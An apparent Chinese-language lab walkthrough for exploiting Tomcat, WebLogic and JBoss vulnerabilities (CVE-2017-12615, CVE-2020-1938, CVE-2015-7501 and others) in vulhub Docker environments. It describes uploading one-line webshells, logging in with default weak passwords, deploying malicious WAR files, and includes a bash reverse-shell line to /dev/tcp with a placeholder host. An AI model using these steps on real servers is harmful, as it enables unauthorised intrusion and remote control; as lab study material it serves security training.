Apache Tomcat漏洞
首先使用kali搭建环境
输入语句cd vulhub-master/tomcat/CVE-2017-12615
docker-compose up -d

使用搭建好的环境IP在网页中打开

然后使用bp进行抓包

将GET改为PUT然后部署一句话木马然后放行
放行后查看一句话木马文件

然后使用中国蚁剑连接

进入就可以看到文件目录

后台弱口令部署war包漏洞
首先使用kali搭建环境
搭建语句cd vulhub-master/tomcat/tomcat8
docker-compose up -d

然后使用找到的IP地址打开然后点击manager app使用弱口令默认为tomcat

然后登陆进来

下一步制作war包,把一句话木马打包成zip



然后打开网页查看自己的一句话木马显示内容

空白就证明正确然后使用工具连接

进入就可以查看文件目录

CVE-2020-1938
首先要搭建好环境在kali中
搭建语句cd vulhub-master/tomcat/CVE-2020-1938
docker-compose up -d
然后打开网页

我们可以看到版本比之前要高而且manager app这个漏洞是不允许登陆的
我们就寻找别的可以挖的地方
然后我们需要在kali中下载一个CVE-2020-1938漏洞

然后创建一句话木马文件

然后在kali中执行

注意要输入python版本 CVE文件的目录.py -p 端口号 -f 一句话木马文件所在目录 IP地址
Weblogic漏洞
后台弱口令getshell
首先我们连接环境使用上面的地址换端口就可以

使用弱口令登录 用户名:weblogic 口令:Oracle@123

点击部署

点击安装

点击上载文件

然后进行文件上传,也是一个一句话木马的war文件
一直点击下一步直到完成

在网页中打开木马文件查看

然后使用工具连接


CVE-2017-3506
仍然使用刚才的环境
然后在IP地址后输入/wls-wsat/coordinatorporttype 如图所示

然后使用工具搜索查询漏洞

然后在命令执行中执行whoami命令

然后在文件上传中上传一个哥斯拉工具生成的木马

上传成功后下面小框会有一个jsp地址可以访问,没有回显说明木马上传成功

然后使用哥斯拉工具进行连接

连接成功后可以进入查看文件和基础信息等内容

CVE-2019-2025
首先连接环境进入主页

url中输入_async/AsyncResponseService出现以下界面就正确

然后在当前界面进行抓包写入shell

然后放行就可以了
放行之后访问木马

最后使用工具进行连接

CVE-2018-2628
首先连接环境

然后有一个非常厉害的工具我们使用他,叫做利群,你没看错就是叫利群 liqun

然后文件上传一个木马


然后进行访问看到无回显


CVE-2018-2894
首先我们进入环境(需要自己搭)

使用用户密码登录,密码是服务器随机生成
设置web服务测试开启: 域结构 -> base-domain -> ⾼级 -> 启动Web服务测试⻚



读取一个config.do文件

然后修改当前工作目录/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_intern al/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css

点击安全然后上传木马文件

右键审查元素 , 然后搜索自己上传的文件 , 找到对应时间戳

然后查看自己的木马文件是否回显

然后使用哥斯拉工具进行连接

JBoss漏洞
CVE-2015-7501
打开环境

下载一个ysoserial工具

然后将bash -i>& /dev/tcp/IP地址/自己的端口 0>&1进行base64编码

然后打开工具的根目录输入如图内容

然后根目录下会自动生成一个文件

CVE-2017-7504
首先打开环境

然后找到jboss的根目录文件使用cmd进行运行

然后就得到了shell输入ls可以看到文件

CVE-2017-12149
首先打开环境

输入invoker/readonly

使用工具检测IP可以检测出漏洞


Administration Console弱囗令
搭建环境

然后输入/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties登陆后台
账户admin密码vulhub

使用用户密码登录

点击web应用程序

然后添加war文件内容是一句话木马

然后使用哥斯拉工具测试

高版本JMX Console未授权
搭建环境

然后点击jmx-console

点击箭头所指的连接

找到addurl含有string

然后再输入框中上传war包

然后直接查看木马是否有回显

然后用哥斯拉工具进行连接


8936

被折叠的 条评论
为什么被折叠?



